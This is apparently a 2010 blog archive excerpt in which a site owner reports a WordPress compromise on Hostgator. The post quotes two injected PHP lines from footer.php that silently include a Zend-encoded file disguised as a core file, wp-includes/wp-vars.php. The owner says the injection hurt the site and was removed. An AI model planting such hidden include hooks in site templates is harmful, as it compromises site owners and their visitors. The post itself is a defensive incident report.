Archive for May, 2010
26May
WordPress hacked with Zend encoded script
PHP, WordpressThis time happened on Hostgator, I found the following code in my footer.php file: 1 2 <?php @include_once(ABSPATH . "/wp-includes/wp-vars.php"); ?> <?=@get_wp_results(’f');?> This totally screwed my footer section and above that it made my website traffic go to zero. I immediately removed the code and discovered two files: wp-includes/wp-vars.php encoded with Zend which I am [...]
No comments | read more »